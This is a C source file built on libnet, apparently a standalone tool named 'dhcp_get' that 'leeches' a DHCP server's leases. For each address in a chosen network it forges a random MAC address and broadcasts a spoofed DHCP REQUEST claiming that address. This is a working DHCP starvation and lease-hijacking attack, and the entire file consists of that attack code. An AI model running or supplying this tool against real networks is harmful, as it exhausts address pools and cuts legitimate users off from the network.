/*
 *  $Id: dhcp_get                                                $
 *
 *  leech a DHCP servers leases
 *  To view: /usr/sbin/tcpdump -vvvvven -s 4096 'port 67 or port 68'
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 */
#include <libnet.h>
void
usage(char *prog)
{
    fprintf(stderr, "Usage: %s interface network\n", prog);
    fprintf(stderr, "i.e:   %s eth0 10.1.1\n", prog);
    exit(1);
}

void
gen_mac (u_char enet_src[]) {
	int i;
	for (i = 0; i < 6; i++) {
  		enet_src[i] = libnet_get_prand(LIBNET_PRu16);
	}
	return;
}

int
main(int argc, char *argv[])
{
    char *intf;
    char *netw;
    int packetnum;
    libnet_t *l;
    struct libnet_stats ls;
    struct libnet_ether_addr *ethaddr;
    libnet_ptag_t eth;
    libnet_ptag_t ip;
    libnet_ptag_t udp;
    libnet_ptag_t dhcp;
    char errbuf[LIBNET_ERRBUF_SIZE];
    u_char *options;
    u_long src_ip;
    
    
    // have to specify interface
    if (argc != 3)
        usage(argv[0]);
    intf = argv[1];
    netw = argv[2];

    l = libnet_init(
            LIBNET_LINK,                            // injection type
            intf,                                   // network interface
            errbuf);                                // errbuf
    if (!l)
    {
        fprintf(stderr, "libnet_init: %s", errbuf);
        exit(EXIT_FAILURE);
    }
    else {
	
       if ((ethaddr = libnet_get_hwaddr(l)) == NULL)
        {
            fprintf(stderr, "libnet_get_hwaddr: %s\n", libnet_geterror(l));
            exit(EXIT_FAILURE);
        }
  
        // loop the spoofing part
	eth = LIBNET_PTAG_INITIALIZER;
	ip = LIBNET_PTAG_INITIALIZER;
	udp = LIBNET_PTAG_INITIALIZER;
	dhcp = LIBNET_PTAG_INITIALIZER;
	libnet_seed_prand(l);
	for (packetnum=1;packetnum<255;packetnum++) { 
		int i;
		char test_ip[15];
		u_long options_len, orig_len;
		u_char *tmp;
		u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
    		u_char enet_src[6]; 
		
		// gen random mac and loop over network ip [packetnum]
	 	gen_mac(enet_src);
		sprintf(test_ip,"%s.%d", netw,packetnum );
		src_ip = libnet_name2addr4(l,test_ip,LIBNET_DONT_RESOLVE);

		printf("try %s ", libnet_addr2name4(src_ip, LIBNET_DONT_RESOLVE));
		printf("| ");
		for (i = 0; i < 6; i++) {
		    printf("%x", enet_src[i]);
		    if (i != 5) { printf(":"); }
		}
		printf("\n");

		
		// build options packet
		i = 0;
		options_len = 3;                            // update total payload size
		// request spoofed ip from server
		options = malloc(3);
		options[i++] = LIBNET_DHCP_MESSAGETYPE;     // type
		options[i++] = 1;                           // len
		options[i++] = LIBNET_DHCP_MSGREQUEST;     // data
		///options[i++] = LIBNET_DHCP_MSGRELEASE;     // data
		
		orig_len = options_len;
		
		// workaround for realloc on old machines
		// options = realloc(options, options_len); // resize options buffer
		tmp = malloc(options_len);
		memcpy(tmp, options, orig_len);
		free(options);
		options = tmp;
		
		// if we have an ip already, let's request it.
		if (src_ip)
		{
		    orig_len = options_len;
		    options_len += 2 + sizeof(src_ip);
		    
		    // workaround for realloc on old machines
		    // options = realloc(options, options_len);
		    tmp = malloc(options_len);
		    memcpy(tmp, options, orig_len);
		    free(options);
		    options = tmp;
		    
		    options[i++] = LIBNET_DHCP_DISCOVERADDR;	// type
		    options[i++] = sizeof(src_ip);			    // len
		    memcpy(options + i, (char *)&src_ip, sizeof(src_ip));// data
		    i += sizeof(src_ip);
		}
		
		// end our options packet
		options[i] = LIBNET_DHCP_END;
		
		// make sure we are at least the minimum length, if not fill
		// this could go in libnet, but we will leave it in the app for now
		if (options_len + LIBNET_DHCPV4_H < LIBNET_BOOTP_MIN_LEN)
		{
		    orig_len = options_len;
		    options_len = LIBNET_BOOTP_MIN_LEN - LIBNET_DHCPV4_H;
		    
		    // workaround for realloc on old machines
		    // options = realloc(options, options_len);
		    tmp = malloc(options_len);
		    memcpy(tmp, options, orig_len);
		    free(options);
		    options = tmp;
		    
		    memset(options + i, 0, options_len - i);
		}
		
		// the goodies are here
		dhcp = libnet_build_dhcpv4(
			LIBNET_DHCP_REQUEST,                            // opcode
			1,                                              // hardware type
			6,                                              // hardware address length
			0,                                              // hop count
			0xdeadbeef,                                     // transaction id
			0,                                              // seconds since bootstrap
			0x8000,                                         // flags
			0,                                              // client ip
			0,	                                        // your ip
			//ntohl(src_ip),                                // your ip
			0,                                              // server ip
			0,                                              // gateway ip
			enet_src,
			NULL,                                           // server host name
			NULL,                                           // boot file
			options,                                        // dhcp options stuck in payload since it is dynamic
			options_len,                                    // length of options
			l,                                              // libnet handle 
			dhcp);                                             // libnet id 
		
		// wrap it
		udp = libnet_build_udp(
			68,                                             // source port
			67,                                             // destination port
			LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len,   // packet size
			0,                                              // checksum
			NULL,                                           // payload 
			0,                                              // payload size 
			l,                                              // libnet handle 
			udp);                                             // libnet id 
		
		// hook me up with some ipv4
		ip = libnet_build_ipv4(
			LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_DHCPV4_H
			+ options_len,                                  // length
			0x10,                                           // TOS
			0,                                              // IP ID
			0,                                              // IP Frag 
			16,                                             // TTL
			IPPROTO_UDP,                                    // protocol
			0,                                              // checksum
			src_ip,                                         // src ip
			inet_addr("255.255.255.255"),                   // destination ip
			NULL,                                           // payload
			0,                                              // payload size
			l,                                              // libnet handle
			ip);                                             // libnet id
		
		eth = libnet_build_ethernet(
				enet_dst,
				enet_src,
				ETHERTYPE_IP,
				NULL,
				0,
				l,
				eth);
		// write to the wire
		if (libnet_write(l) == -1)
		{
		    fprintf(stderr, " %s: libnet_write: %s\n", argv[0],
			    strerror(errno));
		    exit(EXIT_FAILURE);
		}
	} ////  packket looop 


        // fill and print stats
        libnet_stats(l, &ls);
        fprintf(stderr, "Packets sent:  %ld\n"
                    "Packet errors: %ld\n"
                    "Bytes written: %ld\n",
                    ls.packets_sent, ls.packet_errors, ls.bytes_written);
        libnet_destroy(l);
        
	// free mem
	free(options);
		
        
        exit(0);
    }
    exit(0);
}
